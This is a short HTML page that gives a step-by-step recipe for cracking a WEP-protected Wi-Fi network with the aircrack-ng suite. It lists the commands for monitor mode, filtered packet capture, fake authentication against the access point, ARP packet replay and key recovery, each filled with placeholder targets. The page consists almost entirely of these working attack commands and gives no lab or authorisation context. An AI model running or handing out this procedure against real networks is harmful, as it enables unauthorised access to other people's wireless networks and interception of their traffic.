<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Cracking WEP via a Client Attack</title>
</head><body>Cracking WEP via a Client Attack<br/>
-----------------------------------------<br/>
<br/>
Place your wireless card into monitor mode on the AP channel:<br/>
<br/>
airmon-ng start &lt;interface&gt; &lt;AP channel&gt;<br/>
<br/>
Start a capture dump, filtering on the AP channel and BSSID, saving the capture to a file:<br/>
<br/>
airodump-ng -c &lt;AP channel&gt; --bssid &lt;AP MAC&gt; -w &lt;capture&gt; &lt;interface&gt;<br/>
<br/>
Next, conduct a fake authentication against the access point:<br/>
<br/>
aireplay-ng -1 0 -e &lt;ESSID&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface&gt;<br/>
<br/>
Launch the interactive packet replay attack looking for ARP packets coming from the AP:<br/>
<br/>
aireplay-ng -2 -b &lt;AP MAC&gt; -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 &lt;interface&gt;<br/>
<br/>
aircrack-ng -z &lt;capture&gt;</body></html>